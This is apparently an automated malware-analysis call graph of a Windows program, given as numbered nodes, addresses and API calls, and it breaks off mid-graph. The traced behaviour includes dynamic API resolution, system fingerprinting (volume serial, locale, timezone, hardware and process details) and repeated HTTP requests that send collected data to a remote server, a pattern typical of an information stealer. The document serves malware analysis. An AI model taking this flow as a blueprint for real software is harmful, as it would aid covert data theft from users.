14522->14523 14524 934289 14523->14524 14525 9345c0 2 API calls 14524->14525 14526 9342a2 14525->14526 14527 9345c0 2 API calls 14526->14527 14528 9342bb 14527->14528 14529 9345c0 2 API calls 14528->14529 14530 9342d4 14529->14530 14531 9345c0 2 API calls 14530->14531 14532 9342ed 14531->14532 14533 9345c0 2 API calls 14532->14533 14534 934306 14533->14534 14535 9345c0 2 API calls 14534->14535 14536 93431f 14535->14536 14537 9345c0 2 API calls 14536->14537 14538 934338 14537->14538 14539 9345c0 2 API calls 14538->14539 14540 934351 14539->14540 14541 9345c0 2 API calls 14540->14541 14542 93436a 14541->14542 14543 9345c0 2 API calls 14542->14543 14544 934383 14543->14544 14545 9345c0 2 API calls 14544->14545 14546 93439c 14545->14546 14547 9345c0 2 API calls 14546->14547 14548 9343b5 14547->14548 14549 9345c0 2 API calls 14548->14549 14550 9343ce 14549->14550 14551 9345c0 2 API calls 14550->14551 14552 9343e7 14551->14552 14553 9345c0 2 API calls 14552->14553 14554 934400 14553->14554 14555 9345c0 2 API calls 14554->14555 14556 934419 14555->14556 14557 9345c0 2 API calls 14556->14557 14558 934432 14557->14558 14559 9345c0 2 API calls 14558->14559 14560 93444b 14559->14560 14561 9345c0 2 API calls 14560->14561 14562 934464 14561->14562 14563 9345c0 2 API calls 14562->14563 14564 93447d 14563->14564 14565 9345c0 2 API calls 14564->14565 14566 934496 14565->14566 14567 9345c0 2 API calls 14566->14567 14568 9344af 14567->14568 14569 9345c0 2 API calls 14568->14569 14570 9344c8 14569->14570 14571 9345c0 2 API calls 14570->14571 14572 9344e1 14571->14572 14573 9345c0 2 API calls 14572->14573 14574 9344fa 14573->14574 14575 9345c0 2 API calls 14574->14575 14576 934513 14575->14576 14577 9345c0 2 API calls 14576->14577 14578 93452c 14577->14578 14579 9345c0 2 API calls 14578->14579 14580 934545 14579->14580 14581 9345c0 2 API calls 14580->14581 14582 93455e 14581->14582 14583 9345c0 2 API calls 14582->14583 14584 934577 14583->14584 14585 9345c0 2 API calls 14584->14585 14586 934590 14585->14586 14587 9345c0 2 API calls 14586->14587 14588 9345a9 14587->14588 14589 949c10 14588->14589 14590 94a036 8 API calls 14589->14590 14591 949c20 43 API calls 14589->14591 14592 94a146 14590->14592 14593 94a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14590->14593 14591->14590 14594 94a216 14592->14594 14595 94a153 8 API calls 14592->14595 14593->14592 14596 94a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14594->14596 14597 94a298 14594->14597 14595->14594 14596->14597 14598 94a2a5 6 API calls 14597->14598 14599 94a337 14597->14599 14598->14599 14600 94a344 9 API calls 14599->14600 14601 94a41f 14599->14601 14600->14601 14602 94a4a2 14601->14602 14603 94a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14601->14603 14604 94a4dc 14602->14604 14605 94a4ab GetProcAddress GetProcAddress 14602->14605 14603->14602 14606 94a515 14604->14606 14607 94a4e5 GetProcAddress GetProcAddress 14604->14607 14605->14604 14608 94a612 14606->14608 14609 94a522 10 API calls 14606->14609 14607->14606 14610 94a67d 14608->14610 14611 94a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14608->14611 14609->14608 14612 94a686 GetProcAddress 14610->14612 14613 94a69e 14610->14613 14611->14610 14612->14613 14614 94a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14613->14614 14615 945ca3 14613->14615 14614->14615 14616 931590 14615->14616 15737 931670 14616->15737 14619 94a7a0 lstrcpy 14620 9315b5 14619->14620 14621 94a7a0 lstrcpy 14620->14621 14622 9315c7 14621->14622 14623 94a7a0 lstrcpy 14622->14623 14624 9315d9 14623->14624 14625 94a7a0 lstrcpy 14624->14625 14626 931663 14625->14626 14627 945510 14626->14627 14628 945521 14627->14628 14629 94a820 2 API calls 14628->14629 14630 94552e 14629->14630 14631 94a820 2 API calls 14630->14631 14632 94553b 14631->14632 14633 94a820 2 API calls 14632->14633 14634 945548 14633->14634 14635 94a740 lstrcpy 14634->14635 14636 945555 14635->14636 14637 94a740 lstrcpy 14636->14637 14638 945562 14637->14638 14639 94a740 lstrcpy 14638->14639 14640 94556f 14639->14640 14641 94a740 lstrcpy 14640->14641 14651 94557c 14641->14651 14642 94a740 lstrcpy 14642->14651 14643 94a7a0 lstrcpy 14643->14651 14644 945643 StrCmpCA 14644->14651 14645 9456a0 StrCmpCA 14646 9457dc 14645->14646 14645->14651 14647 94a8a0 lstrcpy 14646->14647 14648 9457e8 14647->14648 14649 94a820 2 API calls 14648->14649 14652 9457f6 14649->14652 14650 945856 StrCmpCA 14650->14651 14653 945991 14650->14653 14651->14642 14651->14643 14651->14644 14651->14645 14651->14650 14658 931590 lstrcpy 14651->14658 14660 94a820 lstrlen lstrcpy 14651->14660 14662 945a0b StrCmpCA 14651->14662 14663 9452c0 25 API calls 14651->14663 14664 9451f0 20 API calls 14651->14664 14677 94a8a0 lstrcpy 14651->14677 14678 94578a StrCmpCA 14651->14678 14681 94593f StrCmpCA 14651->14681 14654 94a820 2 API calls 14652->14654 14656 94a8a0 lstrcpy 14653->14656 14655 945805 14654->14655 14657 931670 lstrcpy 14655->14657 14659 94599d 14656->14659 14680 945811 14657->14680 14658->14651 14661 94a820 2 API calls 14659->14661 14660->14651 14665 9459ab 14661->14665 14667 945a16 Sleep 14662->14667 14668 945a28 14662->14668 14663->14651 14664->14651 14666 94a820 2 API calls 14665->14666 14669 9459ba 14666->14669 14667->14651 14670 94a8a0 lstrcpy 14668->14670 14671 931670 lstrcpy 14669->14671 14672 945a34 14670->14672 14671->14680 14673 94a820 2 API calls 14672->14673 14674 945a43 14673->14674 14675 94a820 2 API calls 14674->14675 14676 945a52 14675->14676 14679 931670 lstrcpy 14676->14679 14677->14651 14678->14651 14679->14680 14680->13734 14681->14651 14683 947553 GetVolumeInformationA 14682->14683 14684 94754c 14682->14684 14685 947591 14683->14685 14684->14683 14686 9475fc GetProcessHeap RtlAllocateHeap 14685->14686 14687 947628 wsprintfA 14686->14687 14688 947619 14686->14688 14690 94a740 lstrcpy 14687->14690 14689 94a740 lstrcpy 14688->14689 14691 945da7 14689->14691 14690->14691 14691->13755 14693 94a7a0 lstrcpy 14692->14693 14694 934899 14693->14694 15746 9347b0 14694->15746 14696 9348a5 14697 94a740 lstrcpy 14696->14697 14698 9348d7 14697->14698 14699 94a740 lstrcpy 14698->14699 14700 9348e4 14699->14700 14701 94a740 lstrcpy 14700->14701 14702 9348f1 14701->14702 14703 94a740 lstrcpy 14702->14703 14704 9348fe 14703->14704 14705 94a740 lstrcpy 14704->14705 14706 93490b InternetOpenA StrCmpCA 14705->14706 14707 934944 14706->14707 14708 934ecb InternetCloseHandle 14707->14708 15752 948b60 14707->15752 14710 934ee8 14708->14710 15767 939ac0 CryptStringToBinaryA 14710->15767 14711 934963 15760 94a920 14711->15760 14714 934976 14716 94a8a0 lstrcpy 14714->14716 14722 93497f 14716->14722 14717 94a820 2 API calls 14718 934f05 14717->14718 14719 94a9b0 4 API calls 14718->14719 14721 934f1b 14719->14721 14720 934f27 ctype 14724 94a7a0 lstrcpy 14720->14724 14723 94a8a0 lstrcpy 14721->14723 14725 94a9b0 4 API calls 14722->14725 14723->14720 14737 934f57 14724->14737 14726 9349a9 14725->14726 14727 94a8a0 lstrcpy 14726->14727 14728 9349b2 14727->14728 14729 94a9b0 4 API calls 14728->14729 14730 9349d1 14729->14730 14731 94a8a0 lstrcpy 14730->14731 14732 9349da 14731->14732 14733 94a920 3 API calls 14732->14733 14734 9349f8 14733->14734 14735 94a8a0 lstrcpy 14734->14735 14736 934a01 14735->14736 14738 94a9b0 4 API calls 14736->14738 14737->13758 14739 934a20 14738->14739 14740 94a8a0 lstrcpy 14739->14740 14741 934a29 14740->14741 14742 94a9b0 4 API calls 14741->14742 14743 934a48 14742->14743 14744 94a8a0 lstrcpy 14743->14744 14745 934a51 14744->14745 14746 94a9b0 4 API calls 14745->14746 14747 934a7d 14746->14747 14748 94a920 3 API calls 14747->14748 14749 934a84 14748->14749 14750 94a8a0 lstrcpy 14749->14750 14751 934a8d 14750->14751 14752 934aa3 InternetConnectA 14751->14752 14752->14708 14753 934ad3 HttpOpenRequestA 14752->14753 14755 934b28 14753->14755 14756 934ebe InternetCloseHandle 14753->14756 14757 94a9b0 4 API calls 14755->14757 14756->14708 14758 934b3c 14757->14758 14759 94a8a0 lstrcpy 14758->14759 14760 934b45 14759->14760 14761 94a920 3 API calls 14760->14761 14762 934b63 14761->14762 14763 94a8a0 lstrcpy 14762->14763 14764 934b6c 14763->14764 14765 94a9b0 4 API calls 14764->14765 14766 934b8b 14765->14766 14767 94a8a0 lstrcpy 14766->14767 14768 934b94 14767->14768 14769 94a9b0 4 API calls 14768->14769 14770 934bb5 14769->14770 14771 94a8a0 lstrcpy 14770->14771 14772 934bbe 14771->14772 14773 94a9b0 4 API calls 14772->14773 14774 934bde 14773->14774 14775 94a8a0 lstrcpy 14774->14775 14776 934be7 14775->14776 14777 94a9b0 4 API calls 14776->14777 14778 934c06 14777->14778 14779 94a8a0 lstrcpy 14778->14779 14780 934c0f 14779->14780 14781 94a920 3 API calls 14780->14781 14782 934c2d 14781->14782 14783 94a8a0 lstrcpy 14782->14783 14784 934c36 14783->14784 14785 94a9b0 4 API calls 14784->14785 14786 934c55 14785->14786 14787 94a8a0 lstrcpy 14786->14787 14788 934c5e 14787->14788 14789 94a9b0 4 API calls 14788->14789 14790 934c7d 14789->14790 14791 94a8a0 lstrcpy 14790->14791 14792 934c86 14791->14792 14793 94a920 3 API calls 14792->14793 14794 934ca4 14793->14794 14795 94a8a0 lstrcpy 14794->14795 14796 934cad 14795->14796 14797 94a9b0 4 API calls 14796->14797 14798 934ccc 14797->14798 14799 94a8a0 lstrcpy 14798->14799 14800 934cd5 14799->14800 14801 94a9b0 4 API calls 14800->14801 14802 934cf6 14801->14802 14803 94a8a0 lstrcpy 14802->14803 14804 934cff 14803->14804 14805 94a9b0 4 API calls 14804->14805 14806 934d1f 14805->14806 14807 94a8a0 lstrcpy 14806->14807 14808 934d28 14807->14808 14809 94a9b0 4 API calls 14808->14809 14810 934d47 14809->14810 14811 94a8a0 lstrcpy 14810->14811 14812 934d50 14811->14812 14813 94a920 3 API calls 14812->14813 14814 934d6e 14813->14814 14815 94a8a0 lstrcpy 14814->14815 14816 934d77 14815->14816 14817 94a740 lstrcpy 14816->14817 14818 934d92 14817->14818 14819 94a920 3 API calls 14818->14819 14820 934db3 14819->14820 14821 94a920 3 API calls 14820->14821 14822 934dba 14821->14822 14823 94a8a0 lstrcpy 14822->14823 14824 934dc6 14823->14824 14825 934de7 lstrlen 14824->14825 14826 934dfa 14825->14826 14827 934e03 lstrlen 14826->14827 15766 94aad0 14827->15766 14829 934e13 HttpSendRequestA 14830 934e32 InternetReadFile 14829->14830 14831 934e67 InternetCloseHandle 14830->14831 14836 934e5e 14830->14836 14834 94a800 14831->14834 14833 94a9b0 4 API calls 14833->14836 14834->14756 14835 94a8a0 lstrcpy 14835->14836 14836->14830 14836->14831 14836->14833 14836->14835 15773 94aad0 14837->15773 14839 9417c4 StrCmpCA 14840 9417cf ExitProcess 14839->14840 14851 9417d7 14839->14851 14841 9419c2 14841->13760 14842 941970 StrCmpCA 14842->14851 14843 9418f1 StrCmpCA 14843->14851 14844 941951 StrCmpCA 14844->14851 14845 941932 StrCmpCA 14845->14851 14846 941913 StrCmpCA 14846->14851 14847 94185d StrCmpCA 14847->14851 14848 94187f StrCmpCA 14848->14851 14849 9418ad StrCmpCA 14849->14851 14850 9418cf StrCmpCA 14850->14851 14851->14841 14851->14842 14851->14843 14851->14844 14851->14845 14851->14846 14851->14847 14851->14848 14851->14849 14851->14850 14852 94a820 lstrlen lstrcpy 14851->14852 14852->14851 14854 94a7a0 lstrcpy 14853->14854 14855 935979 14854->14855 14856 9347b0 2 API calls 14855->14856 14857 935985 14856->14857 14858 94a740 lstrcpy 14857->14858 14859 9359ba 14858->14859 14860 94a740 lstrcpy 14859->14860 14861 9359c7 14860->14861 14862 94a740 lstrcpy 14861->14862 14863 9359d4 14862->14863 14864 94a740 lstrcpy 14863->14864 14865 9359e1 14864->14865 14866 94a740 lstrcpy 14865->14866 14867 9359ee InternetOpenA StrCmpCA 14866->14867 14868 935a1d 14867->14868 14869 935fc3 InternetCloseHandle 14868->14869 14870 948b60 3 API calls 14868->14870 14871 935fe0 14869->14871 14872 935a3c 14870->14872 14874 939ac0 4 API calls 14871->14874 14873 94a920 3 API calls 14872->14873 14875 935a4f 14873->14875 14876 935fe6 14874->14876 14877 94a8a0 lstrcpy 14875->14877 14878 94a820 2 API calls 14876->14878 14880 93601f ctype 14876->14880 14882 935a58 14877->14882 14879 935ffd 14878->14879 14881 94a9b0 4 API calls 14879->14881 14884 94a7a0 lstrcpy 14880->14884 14883 936013 14881->14883 14886 94a9b0 4 API calls 14882->14886 14885 94a8a0 lstrcpy 14883->14885 14894 93604f 14884->14894 14885->14880 14887 935a82 14886->14887 14888 94a8a0 lstrcpy 14887->14888 14889 935a8b 14888->14889 14890 94a9b0 4 API calls 14889->14890 14891 935aaa 14890->14891 14892 94a8a0 lstrcpy 14891->14892 14893 935ab3 14892->14893 14895 94a920 3 API calls 14893->14895 14894->13766 14896 935ad1 14895->14896 14897 94a8a0 lstrcpy 14896->14897 14898 935ada 14897->14898 14899 94a9b0 4 API calls 14898->14899 14900 935af9 14899->14900 14901 94a8a0 lstrcpy 14900->14901 14902 935b02 14901->14902 14903 94a9b0 4 API calls 14902->14903 14904 935b21 14903->14904 14905 94a8a0 lstrcpy 14904->14905 14906 935b2a 14905->14906 14907 94a9b0 4 API calls 14906->14907 14908 935b56 14907->14908 14909 94a920 3 API calls 14908->14909 14910 935b5d 14909->14910 14911 94a8a0 lstrcpy 14910->14911 14912 935b66 14911->14912 14913 935b7c InternetConnectA 14912->14913 14913->14869 14914 935bac HttpOpenRequestA 14913->14914 14916 935fb6 InternetCloseHandle 14914->14916 14917 935c0b 14914->14917 14916->14869 14918 94a9b0 4 API calls 14917->14918 14919 935c1f 14918->14919 14920 94a8a0 lstrcpy 14919->14920 14921 935c28 14920->14921 14922 94a920 3 API calls 14921->14922 14923 935c46 14922->14923 14924 94a8a0 lstrcpy 14923->14924 14925 935c4f 14924->14925 14926 94a9b0 4 API calls 14925->14926 14927 935c6e 14926->14927 14928 94a8a0 lstrcpy 14927->14928 14929 935c77 14928->14929 14930 94a9b0 4 API calls 14929->14930 14931 935c98 14930->14931 14932 94a8a0 lstrcpy 14931->14932 14933 935ca1 14932->14933 14934 94a9b0 4 API calls 14933->14934 14935 935cc1 14934->14935 14936 94a8a0 lstrcpy 14935->14936 14937 935cca 14936->14937 14938 94a9b0 4 API calls 14937->14938 14939 935ce9 14938->14939 14940 94a8a0 lstrcpy 14939->14940 14941 935cf2 14940->14941 14942 94a920 3 API calls 14941->14942 14943 935d10 14942->14943 14944 94a8a0 lstrcpy 14943->14944 14945 935d19 14944->14945 14946 94a9b0 4 API calls 14945->14946 14947 935d38 14946->14947 14948 94a8a0 lstrcpy 14947->14948 14949 935d41 14948->14949 14950 94a9b0 4 API calls 14949->14950 14951 935d60 14950->14951 14952 94a8a0 lstrcpy 14951->14952 14953 935d69 14952->14953 14954 94a920 3 API calls 14953->14954 14955 935d87 14954->14955 14956 94a8a0 lstrcpy 14955->14956 14957 935d90 14956->14957 14958 94a9b0 4 API calls 14957->14958 14959 935daf 14958->14959 14960 94a8a0 lstrcpy 14959->14960 14961 935db8 14960->14961 14962 94a9b0 4 API calls 14961->14962 14963 935dd9 14962->14963 14964 94a8a0 lstrcpy 14963->14964 14965 935de2 14964->14965 14966 94a9b0 4 API calls 14965->14966 14967 935e02 14966->14967 14968 94a8a0 lstrcpy 14967->14968 14969 935e0b 14968->14969 14970 94a9b0 4 API calls 14969->14970 14971 935e2a 14970->14971 14972 94a8a0 lstrcpy 14971->14972 14973 935e33 14972->14973 14974 94a920 3 API calls 14973->14974 14975 935e54 14974->14975 14976 94a8a0 lstrcpy 14975->14976 14977 935e5d 14976->14977 14978 935e70 lstrlen 14977->14978 15774 94aad0 14978->15774 14980 935e81 lstrlen GetProcessHeap RtlAllocateHeap 15775 94aad0 14980->15775 14982 935eae lstrlen 14983 935ebe 14982->14983 14984 935ed7 lstrlen 14983->14984 14985 935ee7 14984->14985 14986 935ef0 lstrlen 14985->14986 14987 935f04 14986->14987 14988 935f1a lstrlen 14987->14988 15776 94aad0 14988->15776 14990 935f2a HttpSendRequestA 14991 935f35 InternetReadFile 14990->14991 14992 935f6a InternetCloseHandle 14991->14992 14996 935f61 14991->14996 14992->14916 14994 94a9b0 4 API calls 14994->14996 14995 94a8a0 lstrcpy 14995->14996 14996->14991 14996->14992 14996->14994 14996->14995 14999 941077 14997->14999 14998 941151 14998->13768 14999->14998 15000 94a820 lstrlen lstrcpy 14999->15000 15000->14999 15002 940db7 15001->15002 15003 940ea4 StrCmpCA 15002->15003 15004 940e27 StrCmpCA 15002->15004 15005 940e67 StrCmpCA 15002->15005 15006 940f17 15002->15006 15007 94a820 lstrlen lstrcpy 15002->15007 15003->15002 15004->15002 15005->15002 15006->13776 15007->15002 15012 940f67 15008->15012 15009 941044 15009->13784 15010 94a820 lstrlen lstrcpy 15010->15012 15011 940fb2 StrCmpCA 15011->15012 15012->15009 15012->15010 15012->15011 15014 94a740 lstrcpy 15013->15014 15015 941a26 15014->15015 15016 94a9b0 4 API calls 15015->15016 15017 941a37 15016->15017 15018 94a8a0 lstrcpy 15017->15018 15019 941a40 15018->15019 15020 94a9b0 4 API calls 15019->15020 15021 941a5b 15020->15021 15022 94a8a0 lstrcpy 15021->15022 15023 941a64 15022->15023 15024 94a9b0 4 API calls 15023->15024 15025 941a7d 15024->15025 15026 94a8a0 lstrcpy 15025->15026 15027 941a86 15026->15027 15028 94a9b0 4 API calls 15027->15028 15029 941aa1 15028->15029 15030 94a8a0 lstrcpy 15029->15030 15031 941aaa 15030->15031 15032 94a9b0 4 API calls 15031->15032 15033 941ac3 15032->15033 15034 94a8a0 lstrcpy 15033->15034 15035 941acc 15034->15035 15036 94a9b0 4 API calls 15035->15036 15037 941ae7 15036->15037 15038 94a8a0 lstrcpy 15037->15038 15039 941af0 15038->15039 15040 94a9b0 4 API calls 15039->15040 15041 941b09 15040->15041 15042 94a8a0 lstrcpy 15041->15042 15043 941b12 15042->15043 15044 94a9b0 4 API calls 15043->15044 15045 941b2d 15044->15045 15046 94a8a0 lstrcpy 15045->15046 15047 941b36 15046->15047 15048 94a9b0 4 API calls 15047->15048 15049 941b4f 15048->15049 15050 94a8a0 lstrcpy 15049->15050 15051 941b58 15050->15051 15052 94a9b0 4 API calls 15051->15052 15053 941b76 15052->15053 15054 94a8a0 lstrcpy 15053->15054 15055 941b7f 15054->15055 15056 947500 6 API calls 15055->15056 15057 941b96 15056->15057 15058 94a920 3 API calls 15057->15058 15059 941ba9 15058->15059 15060 94a8a0 lstrcpy 15059->15060 15061 941bb2 15060->15061 15062 94a9b0 4 API calls 15061->15062 15063 941bdc 15062->15063 15064 94a8a0 lstrcpy 15063->15064 15065 941be5 15064->15065 15066 94a9b0 4 API calls 15065->15066 15067 941c05 15066->15067 15068 94a8a0 lstrcpy 15067->15068 15069 941c0e 15068->15069 15777 947690 GetProcessHeap RtlAllocateHeap 15069->15777 15072 94a9b0 4 API calls 15073 941c2e 15072->15073 15074 94a8a0 lstrcpy 15073->15074 15075 941c37 15074->15075 15076 94a9b0 4 API calls 15075->15076 15077 941c56 15076->15077 15078 94a8a0 lstrcpy 15077->15078 15079 941c5f 15078->15079 15080 94a9b0 4 API calls 15079->15080 15081 941c80 15080->15081 15082 94a8a0 lstrcpy 15081->15082 15083 941c89 15082->15083 15784 9477c0 GetCurrentProcess IsWow64Process 15083->15784 15086 94a9b0 4 API calls 15087 941ca9 15086->15087 15088 94a8a0 lstrcpy 15087->15088 15089 941cb2 15088->15089 15090 94a9b0 4 API calls 15089->15090 15091 941cd1 15090->15091 15092 94a8a0 lstrcpy 15091->15092 15093 941cda 15092->15093 15094 94a9b0 4 API calls 15093->15094 15095 941cfb 15094->15095 15096 94a8a0 lstrcpy 15095->15096 15097 941d04 15096->15097 15098 947850 3 API calls 15097->15098 15099 941d14 15098->15099 15100 94a9b0 4 API calls 15099->15100 15101 941d24 15100->15101 15102 94a8a0 lstrcpy 15101->15102 15103 941d2d 15102->15103 15104 94a9b0 4 API calls 15103->15104 15105 941d4c 15104->15105 15106 94a8a0 lstrcpy 15105->15106 15107 941d55 15106->15107 15108 94a9b0 4 API calls 15107->15108 15109 941d75 15108->15109 15110 94a8a0 lstrcpy 15109->15110 15111 941d7e 15110->15111 15112 9478e0 3 API calls 15111->15112 15113 941d8e 15112->15113 15114 94a9b0 4 API calls 15113->15114 15115 941d9e 15114->15115 15116 94a8a0 lstrcpy 15115->15116 15117 941da7 15116->15117 15118 94a9b0 4 API calls 15117->15118 15119 941dc6 15118->15119 15120 94a8a0 lstrcpy 15119->15120 15121 941dcf 15120->15121 15122 94a9b0 4 API calls 15121->15122 15123 941df0 15122->15123 15124 94a8a0 lstrcpy 15123->15124 15125 941df9 15124->15125 15786 947980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15125->15786 15128 94a9b0 4 API calls 15129 941e19 15128->15129 15130 94a8a0 lstrcpy 15129->15130 15131 941e22 15130->15131 15132 94a9b0 4 API calls 15131->15132 15133 941e41 15132->15133 15134 94a8a0 lstrcpy 15133->15134 15135 941e4a 15134->15135 15136 94a9b0 4 API calls 15135->15136 15137 941e6b 15136->15137 15138 94a8a0 lstrcpy 15137->15138 15139 941e74 15138->15139 15788 947a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15139->15788 15142 94a9b0 4 API calls 15143 941e94 15142->15143 15144 94a8a0 lstrcpy 15143->15144 15145 941e9d 15144->15145 15146 94a9b0 4 API calls 15145->15146 15147 941ebc 15146->15147 15148 94a8a0 lstrcpy 15147->15148 15149 941ec5 15148->15149 15150 94a9b0 4 API calls 15149->15150 15151 941ee5 15150->15151 15152 94a8a0 lstrcpy 15151->15152 15153 941eee 15152->15153 15791 947b00 GetUserDefaultLocaleName 15153->15791 15156 94a9b0 4 API calls 15157 941f0e 15156->15157 15158 94a8a0 lstrcpy 15157->15158 15159 941f17 15158->15159 15160 94a9b0 4 API calls 15159->15160 15161 941f36 15160->15161 15162 94a8a0 lstrcpy 15161->15162 15163 941f3f 15162->15163 15164 94a9b0 4 API calls 15163->15164 15165 941f60 15164->15165 15166 94a8a0 lstrcpy 15165->15166 15167 941f69 15166->15167 15795 947b90 15167->15795 15169 941f80 15170 94a920 3 API calls 15169->15170 15171 941f93 15170->15171 15172 94a8a0 lstrcpy 15171->15172 15173 941f9c 15172->15173 15174 94a9b0 4 API calls 15173->15174 15175 941fc6 15174->15175 15176 94a8a0 lstrcpy 15175->15176 15177 941fcf 15176->15177 15178 94a9b0 4 API calls 15177->15178 15179 941fef 15178->15179 15180 94a8a0 lstrcpy 15179->15180 15181 941ff8 15180->15181 15807 947d80 GetSystemPowerStatus 15181->15807 15184 94a9b0 4 API calls 15185 942018 15184->15185 15186 94a8a0 lstrcpy 15185->15186 15187 942021 15186->15187 15188 94a9b0 4 API calls 15187->15188 15189 942040 15188->15189 15190 94a8a0 lstrcpy 15189->15190 15191 942049 15190->15191 15192 94a9b0 4 API calls 15191->15192 15193 94206a 15192->15193 15194 94a8a0 lstrcpy 15193->15194 15195 942073 15194->15195 15196 94207e GetCurrentProcessId 15195->15196 15809 949470 OpenProcess 15196->15809 15199 94a920 3 API calls 15200 9420a4 15199->15200 15201 94a8a0 lstrcpy 15200->15201 15202 9420ad 15201->15202 15203 94a9b0 4 API calls 15202->15203 15204 9420d7 15203->15204 15205 94a8a0 lstrcpy 15204->15205 15206 9420e0 15205->15206 15207 94a9b0 4 API calls 15206->15207 15208 942100 15207->15208 15209 94a8a0 lstrcpy 15208->15209 15210 942109 15209->15210 15814 947e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15210->15814 15213 94a9b0 4 API calls 15214 942129 15213->15214 15215 94a8a0 lstrcpy 15214->15215 15216 942132 15215->15216 15217 94a9b0 4 API calls 15216->15217 15218 942151 15217->15218 15219 94a8a0 lstrcpy 15218->15219 15220 94215a 15219->15220 15221 94a9b0 4 API calls 15220->15221 15222 94217b 15221->15222 15223 94a8a0 lstrcpy 15222->15223 15224 942184 15223->15224 15818 947f60 15224->15818 15227 94a9b0 4 API calls 15228 9421a4 15227->15228 15229 94a8a0 lstrcpy 15228->15229 15230 9421ad 15229->15230 15231 94a9b0 4 API calls 15230->15231 15232 9421cc 15231->15232 15233 94a8a0 lstrcpy 15232->15233 15234 9421d5 15233->15234 15235 94a9b0 4 API calls 15234->15235 15236 9421f6 15235->15236 15237 94a8a0 lstrcpy 15236->15237 15238 9421ff 15237->15238 15831 947ed0 GetSystemInfo wsprintfA 15238->15831 15241 94a9b0 4 API calls 15242 94221f 15241->15242 15243 94a8a0 lstrcpy 15242->15243 15244 942228 15243->15244 15245 94a9b0 4 API calls 15244->15245 15246 942247 15245->15246 15247 94a8a0 lstrcpy 15246->15247 15248 942250 15247->15248 15249 94a9b0 4 API calls 15248->15249 15250 942270 15249->15250 15251 94a8a0 lstrcpy 15250->15251 15252 942279 15251->15252 15833 948100 GetProcessHeap RtlAllocateHeap 15252->15833 15255 94a9b0 4 API calls 15256 942299 15255->15256 15257 94a8a0 lstrcpy 15256->15257 15258 9422a2 15257->15258 15259 94a9b0 4 API calls 15258->15259 15260 9422c1 15259->15260 15261 94a8a0 lstrcpy 15260->15261 15262 9422ca 15261->15262 15263 94a9b0 4 API calls 15262->15263 15264 9422eb 15263->15264 15265 94a8a0 lstrcpy 15264->15265 15266 9422f4 15265->15266 15839 9487c0 15266->15839 15269 94a920 3 API calls 15270 94231e 15269->15270 15271 94a8a0 lstrcpy 15270->15271 15272 942327 15271->15272 15273 94a9b0 4 API calls 15272->15273 15274 942351 15273->15274 15275 94a8a0 lstrcpy 15274->15275 15276 94235a 15275->15276 15277 94a9b0 4 API calls 15276->15277 15278 94237a 15277->15278 15279 94a8a0 lstrcpy 15278->15279 15280 942383 15279->15280 15281 94a9b0 4 API calls 15280->15281 15282 9423a2 15281->15282 15283 94a8a0 lstrcpy 15282->15283 15284 9423ab 15283->15284 15844 9481f0 15284->15844 15286 9423c2 15287 94a920 3 API calls 15286->15287 15288 9423d5 15287->15288 15289 94a8a0 lstrcpy 15288->15289 15290 9423de 15289->15290 15291 94a9b0 4 API calls 15290->15291 15292 94240a 15291->15292 15293 94a8a0 lstrcpy 15292->15293 15294 942413 15293->15294 15295 94a9b0 4 API calls 15294->15295 15296 942432 15295->15296 15297 94a8a0 lstrcpy 15296->15297 15298 94243b 15297->15298 15299 94a9b0 4 API calls 15298->15299 15300 94245c 15299->15300 15301 94a8a0 lstrcpy 15300->15301 15302 942465 15301->15302 15303 94a9b0 4 API calls 15302->15303 15304 942484 15303->15304 15305 94a8a0 lstrcpy 15304->15305 15306 94248d 15305->15306 15307 94a9b0 4 API calls 15306->15307 15308 9424ae 15307->15308 15309 94a8a0 lstrcpy 15308->15309 15310 9424b7 15309->15310 15852 948320 15310->15852 15312 9424d3 15313 94a920 3 API calls 15312->15313 15314 9424e6 15313->15314 15315 94a8a0 lstrcpy 15314->15315 15316 9424ef 15315->15316 15317 94a9b0 4 API calls 15316->15317 15318 942519 15317->15318 15319 94a8a0 lstrcpy 15318->15319 15320 942522 15319->15320 15321 94a9b0 4 API calls 15320->15321 15322 942543 15321->15322 15323 94a8a0 lstrcpy 15322->15323 15324 94254c 15323->15324 15325 948320 17 API calls 15324->15325 15326 942568 15325->15326 15327 94a920 3 API calls 15326->15327 15328 94257b 15327->15328 15329 94a8a0 lstrcpy 15328->15329 15330 942584 15329->15330 15331 94a9b0 4 API calls 15330->15331 15332 9425ae 15331->15332 15333 94a8a0 lstrcpy 15332->15333 15334 9425b7 15333->15334 15335 94a9b0 4 API calls 15334->15335 15336 9425d6 15335->15336 15337 94a8a0 lstrcpy 15336->15337 15338 9425df 15337->15338 15339 94a9b0 4 API calls 15338->15339 15340 942600 15339->15340 15341 94a8a0 lstrcpy 15340->15341 15342 942609 15341->15342 15888 948680 15342->15888 15344 942620 15345 94a920 3 API calls 15344->15345 15346 942633 15345->15346 15347 94a8a0 lstrcpy 15346->15347 15348 94263c 15347->15348 15349 94265a lstrlen 15348->15349 15350 94266a 15349->15350 15351 94a740 lstrcpy 15350->15351 15352 94267c 15351->15352 15353 931590 lstrcpy 15352->15353 15354 94268d 15353->15354 15898 945190 15354->15898 15356 942699 15356->13788 16086 94aad0 15357->16086 15359 935009 InternetOpenUrlA 15360 935021 15359->15360 15361 9350a0 InternetCloseHandle InternetCloseHandle 15360->15361 15362 93502a InternetReadFile 15360->15362 15363 9350ec 15361->15363 15362->15360 15363->13792 16087 9398d0 15364->16087 15366 940759 15367 94077d 15366->15367 15368 940a38 15366->15368 15371 940799 StrCmpCA 15367->15371 15369 931590 lstrcpy 15368->15369 15370 940a49 15369->15370 16263 940250 15370->16263 15373 9407a8 15371->15373 15374 940843 15371->15374 15376 94a7a0 lstrcpy 15373->15376 15377 940865 StrCmpCA 15374->15377 15378 9407c3 15376->15378 15379 940874 15377->15379 15416 94096b 15377->15416 15380 931590 lstrcpy 15378->15380 15381 94a740 lstrcpy 15379->15381 15382 94080c 15380->15382 15384 940881 15381->15384 15385 94a7a0 lstrcpy 15382->15385 15383 94099c StrCmpCA 15386 9409ab 15383->15386 15405 940a2d 15383->15405 15387 94a9b0 4 API calls 15384->15387 15388 940823 15385->15388 15389 